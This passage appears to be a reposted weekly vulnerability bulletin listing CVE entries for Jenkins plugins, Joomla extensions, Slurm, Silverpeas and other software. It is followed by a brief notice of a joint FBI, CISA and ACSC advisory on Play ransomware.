jenkins — jenkins Jenkins OpenId Connect Authentication Plugin 2.6 and earlier stores a password of a local user account used as an anti-lockout feature in a recoverable format, allowing attackers with access to the Jenkins controller file system to recover the plain text password of that account, likely gaining administrator access to Jenkins. 2023-12-13 not yet calculated CVE-2023-50770
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins Jenkins OpenId Connect Authentication Plugin 2.6 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins, allowing attackers to perform phishing attacks. 2023-12-13 not yet calculated CVE-2023-50771
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins Jenkins Dingding JSON Pusher Plugin 2.0 and earlier stores access tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system. 2023-12-13 not yet calculated CVE-2023-50772
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins Jenkins Dingding JSON Pusher Plugin 2.0 and earlier does not mask access tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them. 2023-12-13 not yet calculated CVE-2023-50773
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins A cross-site request forgery (CSRF) vulnerability in Jenkins HTMLResource Plugin 1.02 and earlier allows attackers to delete arbitrary files on the Jenkins controller file system. 2023-12-13 not yet calculated CVE-2023-50774
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins A cross-site request forgery (CSRF) vulnerability in Jenkins Deployment Dashboard Plugin 1.0.10 and earlier allows attackers to copy jobs. 2023-12-13 not yet calculated CVE-2023-50775
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier stores PaaSLane authentication tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system. 2023-12-13 not yet calculated CVE-2023-50776
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier does not mask PaaSLane authentication tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them. 2023-12-13 not yet calculated CVE-2023-50777
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins A cross-site request forgery (CSRF) vulnerability in Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier allows attackers to connect to an attacker-specified URL using an attacker-specified token. 2023-12-13 not yet calculated CVE-2023-50778
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins Missing permission checks in Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified URL using an attacker-specified token. 2023-12-13 not yet calculated CVE-2023-50779
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
joomla — joomla A reflected XSS vulnerability was discovered in the LivingWord component for Joomla. 2023-12-14 not yet calculated CVE-2023-40627
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Extplorer component for Joomla. 2023-12-14 not yet calculated CVE-2023-40628
security@joomla.org
joomla — joomla SQLi vulnerability in LMS Lite component for Joomla. 2023-12-14 not yet calculated CVE-2023-40629
security@joomla.org
joomla — joomla Unauthenticated LFI/SSRF in JCDashboards component for Joomla. 2023-12-14 not yet calculated CVE-2023-40630
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Proforms Basic component for Joomla. 2023-12-14 not yet calculated CVE-2023-40655
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Quickform component for Joomla. 2023-12-14 not yet calculated CVE-2023-40656
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Joomdoc component for Joomla. 2023-12-14 not yet calculated CVE-2023-40657
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Clicky Analytics Dashboard module for Joomla. 2023-12-14 not yet calculated CVE-2023-40658
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Easy Quick Contact module for Joomla. 2023-12-14 not yet calculated CVE-2023-40659
security@joomla.org
joomla — joomla SQLi vulnerability in S5 Register module for Joomla. 2023-12-14 not yet calculated CVE-2023-49707
security@joomla.org
joomla — joomla SQLi vulnerability in Starshop component for Joomla. 2023-12-14 not yet calculated CVE-2023-49708
security@joomla.org
kubeflow — kubeflow/kubeflow Server-Side Request Forgery (SSRF) in kubeflow/kubeflow 2023-12-14 not yet calculated CVE-2023-6570
security@huntr.dev
kubeflow — kubeflow/kubeflow Cross-site Scripting (XSS) – Reflected in kubeflow/kubeflow 2023-12-14 not yet calculated CVE-2023-6571
security@huntr.dev
lockss-daemon — lockss-daemon lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick. 2023-12-15 not yet calculated CVE-2023-42183
cve@mitre.org
majordomo — majordomo MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager. 2023-12-15 not yet calculated CVE-2023-50917
cve@mitre.org
cve@mitre.org
microweber — microweber Business Logic Errors in GitHub repository microweber/microweber prior to 2.0. 2023-12-15 not yet calculated CVE-2023-6832
security@huntr.dev
security@huntr.dev
misp — misp app/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs. 2023-12-15 not yet calculated CVE-2023-50918
cve@mitre.org
cve@mitre.org
mlflow — mlflow Path Traversal: ‘..filename’ in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-15 not yet calculated CVE-2023-6831
security@huntr.dev
security@huntr.dev
mozilla — nss The NSS code used for checking PKCS#1 v1.5 was leaking information useful in mounting Bleichenbacher-like attacks. Both the overall correctness of the padding as well as the length of the encrypted message was leaking through timing side-channel. By sending large number of attacker-selected ciphertexts, the attacker would be able to decrypt a previously intercepted PKCS#1 v1.5 ciphertext (for example, to decrypt a TLS session that used RSA key exchange), or forge a signature using the victim’s key. The issue was fixed by implementing the implicit rejection algorithm, in which the NSS returns a deterministic random message in case invalid padding is detected, as proposed in the Marvin Attack paper. This vulnerability affects NSS < 3.61. 2023-12-12 not yet calculated CVE-2023-4421
security@mozilla.org
security@mozilla.org
nagios — nagios_xi Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool. 2023-12-14 not yet calculated CVE-2023-48084
cve@mitre.org
nagios — nagios_xi Nagios XI before version 5.11.3 was discovered to contain a remote code execution (RCE) vulnerability via the component command_test.php. 2023-12-14 not yet calculated CVE-2023-48085
cve@mitre.org
netgear — wnr2000v4 A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication. 2023-12-15 not yet calculated CVE-2023-50089
cve@mitre.org
cve@mitre.org
opc_foundation — opc_ua_.net_standard_reference_server The OPC UA .NET Standard Reference Server before 1.4.371.86. places sensitive information into an error message that may be seen remotely. 2023-12-12 not yet calculated CVE-2023-31048
cve@mitre.org
cve@mitre.org
cve@mitre.org
parallels — parallels_ras The Remote Application Server in Parallels RAS before 19.2.23975 does not segment virtualized applications from the server, which allows a remote attacker to achieve remote code execution via standard kiosk breakout techniques. 2023-12-14 not yet calculated CVE-2023-45894
cve@mitre.org
phpmyfaq — phpmyfaq Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. 2023-12-16 not yet calculated CVE-2023-6889
security@huntr.dev
security@huntr.dev
phpmyfaq — phpmyfaq Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. 2023-12-16 not yet calculated CVE-2023-6890
security@huntr.dev
security@huntr.dev
pluck-cms — pluck-cms An arbitrary file upload vulnerability in the component /inc/modules_install.php of Pluck-CMS v4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file. 2023-12-14 not yet calculated CVE-2023-50564
cve@mitre.org
plutosvg — plutosvg PlutoSVG commit 336c02997277a1888e6ccbbbe674551a0582e5c4 and before was discovered to contain an integer overflow via the component plutosvg_load_from_memory. 2023-12-14 not yet calculated CVE-2023-44709
cve@mitre.org
cve@mitre.org
popojicms — popojicms PopojiCMS version 2.0.1 is vulnerable to remote command execution in the Meta Social field. 2023-12-14 not yet calculated CVE-2023-50011
cve@mitre.org
prestashop — sunnytoo_sturls SQL njection vulnerability in SunnyToo sturls before version 1.1.13, allows attackers to escalate privileges and obtain sensitive information via StUrls::hookActionDispatcher and StUrls::getInstanceId methods. 2023-12-14 not yet calculated CVE-2023-46348
cve@mitre.org
primx_zed! — zed_containers ZED containers produced by PRIMX ZED! for Windows before Q.2020.3 (ANSSI qualification submission), ZED! for Windows before Q.2021.2 (ANSSI qualification submission), ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission), ZONECENTRAL for Windows before 2023.5, or ZEDMAIL for Windows before 2023.5 disclose the original path in which the containers were created, which allows an unauthenticated attacker to obtain some information regarding the context of use (project name, etc.). 2023-12-13 not yet calculated CVE-2023-50439
cve@mitre.org
cve@mitre.org
primx_zed! — zed_containers ZED containers produced by PRIMX ZED! for Windows before Q.2020.3 (ANSSI qualification submission); ZED! for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before 2023.5; ZEDMAIL for Windows before 2023.5; ZED! for Windows, Mac, Linux before 2023.5; ZEDFREE for Windows, Mac, Linux before 2023.5; or ZEDPRO for Windows, Mac, Linux before 2023.5 can be modified by an unauthenticated attacker to include a UNC reference so that it could trigger network access to an attacker-controlled computer when opened by the victim. 2023-12-13 not yet calculated CVE-2023-50440
cve@mitre.org
cve@mitre.org
primx_zonecentral — encrypted_disks Encrypted disks created by PRIMX CRYHOD for Windows before Q.2020.4 (ANSSI qualification submission) or CRYHOD for Windows before 2023.5 can be modified by an unauthenticated attacker to include a UNC reference so that it could trigger outbound network traffic from computers on which disks are opened. 2023-12-13 not yet calculated CVE-2023-50443
cve@mitre.org
cve@mitre.org
primx_zonecentral — encrypted_folders Encrypted folders created by PRIMX ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission) or ZONECENTRAL for Windows before 2023.5 can be modified by an unauthenticated attacker to include a UNC reference so that it could trigger outbound network traffic from computers on which folders are opened. 2023-12-13 not yet calculated CVE-2023-50441
cve@mitre.org
cve@mitre.org
primx_zonecentral — encrypted_folders Encrypted folders created by PRIMX ZONECENTRAL through 2023.5 can be modified by a local attacker (with appropriate privileges) so that specific file types are excluded from encryption temporarily. (This modification can, however, be detected, as described in the Administrator Guide.) 2023-12-13 not yet calculated CVE-2023-50442
cve@mitre.org
cve@mitre.org
primx_zonecentral — multiple_products By default, .ZED containers produced by PRIMX ZED! for Windows before Q.2020.3 (ANSSI qualification submission); ZED! for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before 2023.5; ZEDMAIL for Windows before 2023.5; and ZED! for Windows, Mac, Linux before 2023.5 include an encrypted version of sensitive user information, which could allow an unauthenticated attacker to obtain it via brute force. 2023-12-13 not yet calculated CVE-2023-50444
cve@mitre.org
cve@mitre.org
relyum — multiple_products An issue was discovered on Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices. There is a Weak SMB configuration with signing disabled. 2023-12-13 not yet calculated CVE-2023-47574
cve@mitre.org
relyum — multiple_products An issue was discovered on Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices. The web interfaces of the Relyum devices are susceptible to reflected XSS. 2023-12-13 not yet calculated CVE-2023-47575
cve@mitre.org
relyum — multiple_products An issue was discovered in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices, allowing authenticated command injection through the web interface. 2023-12-13 not yet calculated CVE-2023-47576
cve@mitre.org
relyum — multiple_products An issue discovered in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 allows for unauthorized password changes due to no check for current password. 2023-12-13 not yet calculated CVE-2023-47577
cve@mitre.org
relyum — multiple_products Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices are susceptible to Cross Site Request Forgery (CSRF) attacks due to the absence of CSRF protection in the web interface. 2023-12-13 not yet calculated CVE-2023-47578
cve@mitre.org
relyum — rely-pcle Relyum RELY-PCIe 22.2.1 devices suffer from a system group misconfiguration, allowing read access to the central password hash file of the operating system. 2023-12-13 not yet calculated CVE-2023-47579
cve@mitre.org
rockoa — rockoa Rockoa <2.3.3 is vulnerable to SQL Injection. The problem exists in the indexAction method in reimpAction.php. 2023-12-13 not yet calculated CVE-2023-49363
cve@mitre.org
rpcms — rpcms A cross-site scripting (XSS) vulnerability in the component /logs/dopost.html in RPCMS v3.5.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. 2023-12-14 not yet calculated CVE-2023-50565
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. There is Improper Enforcement of Message Integrity During Transmission in a Communication Channel. This allows attackers to modify RPC traffic in a way that bypasses message hash checks. The fixed versions are 22.05.11, 23.02.7, and 23.11.1. 2023-12-14 not yet calculated CVE-2023-49933
cve@mitre.org
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 23.11.x. There is SQL Injection against the SlurmDBD database. The fixed version is 23.11.1. 2023-12-14 not yet calculated CVE-2023-49934
cve@mitre.org
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 23.02.x and 23.11.x. There is Incorrect Access Control because of a slurmd Message Integrity Bypass. An attacker can reuse root-level authentication tokens during interaction with the slurmd process. This bypasses the RPC message hashes that protect against undesired MUNGE credential reuse. The fixed versions are 23.02.7 and 23.11.1. 2023-12-14 not yet calculated CVE-2023-49935
cve@mitre.org
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. A NULL pointer dereference leads to denial of service. The fixed versions are 22.05.11, 23.02.7, and 23.11.1. 2023-12-14 not yet calculated CVE-2023-49936
cve@mitre.org
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. Because of a double free, attackers can cause a denial of service or possibly execute arbitrary code. The fixed versions are 22.05.11, 23.02.7, and 23.11.1. 2023-12-14 not yet calculated CVE-2023-49937
cve@mitre.org
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 22.05.x and 23.02.x. There is Incorrect Access Control: an attacker can modified their extended group list that is used with the sbcast subsystem, and open files with an unauthorized set of extended groups. The fixed versions are 22.05.11 and 23.02.7. 2023-12-14 not yet calculated CVE-2023-49938
cve@mitre.org
cve@mitre.org
semcms — semcms Semcms v4.8 was discovered to contain a SQL injection vulnerability via the AID parameter at SEMCMS_Function.php. 2023-12-14 not yet calculated CVE-2023-50563
cve@mitre.org
shenzhen_libituo_technology_co.,_ltd — lbt-7300-t310 Shenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi. 2023-12-15 not yet calculated CVE-2023-50469
cve@mitre.org
silverpeas — core Silverpeas Core 6.3.1 is vulnerable to Cross Site Scripting (XSS) via the message/notification feature. 2023-12-13 not yet calculated CVE-2023-47324
cve@mitre.org
cve@mitre.org
cve@mitre.org
silverpeas — core Silverpeas Core 6.3.1 administrative “Bin” feature is affected by broken access control. A user with low privileges is able to navigate directly to the bin, revealing all deleted spaces. The user can then restore or permanently delete the spaces. 2023-12-13 not yet calculated CVE-2023-47325
cve@mitre.org
cve@mitre.org
silverpeas — core Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function. 2023-12-13 not yet calculated CVE-2023-47326
cve@mitre.org
cve@mitre.org
silverpeas — core The “Create a Space” feature in Silverpeas Core 6.3.1 is reserved for use by administrators. This function suffers from broken access control, allowing any authenticated user to create a space by navigating to the correct URL. 2023-12-13 not yet calculated CVE-2023-47327
cve@mitre.org
cve@mitre.org
softing — opc_ua_c++_sdk An uncaught exception issue discovered in Softing OPC UA C++ SDK before 6.30 for Windows operating system may cause the application to crash when the server wants to send an error packet, while socket is blocked on writing. 2023-12-14 not yet calculated CVE-2023-41151
cve@mitre.org
tinyxml — tinyxml StringEqual in TiXmlDeclaration::Parse in tinyxmlparser.cpp in TinyXML through 2.6.2 has a reachable assertion (and application exit) via a crafted XML document with a ‘’ located after whitespace. 2023-12-13 not yet calculated CVE-2023-34194
cve@mitre.org
cve@mitre.org
uffizio — gps_tracker An improper access control vulnerability exists in Uffizio’s GPS Tracker all versions that lead to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed. 2023-12-16 not yet calculated CVE-2020-17483
cve@mitre.org
cve@mitre.org
uffizio — gps_tracker An Open Redirection vulnerability exists in Uffizio’s GPS Tracker all versions allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain. 2023-12-16 not yet calculated CVE-2020-17484
cve@mitre.org
cve@mitre.org
uffizio — gps_tracker A Remote Code Execution vulnerability exist in Uffizio’s GPS Tracker all versions. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources 2023-12-16 not yet calculated CVE-2020-17485
cve@mitre.org
cve@mitre.org
unrealircd — unrealircd A buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms. 2023-12-16 not yet calculated CVE-2023-50784
cve@mitre.org
cve@mitre.org
vmware — workspace_one_launcher Workspace ONE Launcher contains a Privilege Escalation Vulnerability. A malicious actor with physical access to Workspace ONE Launcher could utilize the Edge Panel feature to bypass setup to gain access to sensitive information. 2023-12-12 not yet calculated CVE-2023-34064
security@vmware.com
wordpress — wordpress Dokmee ECM 7.4.6 allows remote code execution because the response to a GettingStarted/SaveSQLConnectionAsync /#/gettingstarted request contains a connection string for privileged SQL Server database access, and xp_cmdshell can be enabled. 2023-12-14 not yet calculated CVE-2023-47261
cve@mitre.org
cve@mitre.org

Back to top

Categories
alerts

FBI, CISA, and ASD’s ACSC Release Advisory on Play Ransomware

Today, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) released a joint Cybersecurity Advisory (CSA), #StopRansomware: Play Ransomware, to disseminate Play ransomware group’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified through FBI investigations as recently as October 2023.

Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data and have impacted a wide range of businesses and critical infrastructure organizations in North America, South America, Europe, and Australia.

FBI, CISA, and the ASD’s ACSC encourage organizations review and implement the recommendations provided in the joint CSA to reduce the likelihood and impact of Play and other ransomware incidents. For more information, see CISA’s #StopRansomware webpage, which includes the updated #StopRansomware Guide.

For Emergency Cyber Security Incident Response please email RedTeam@DefendEdge.com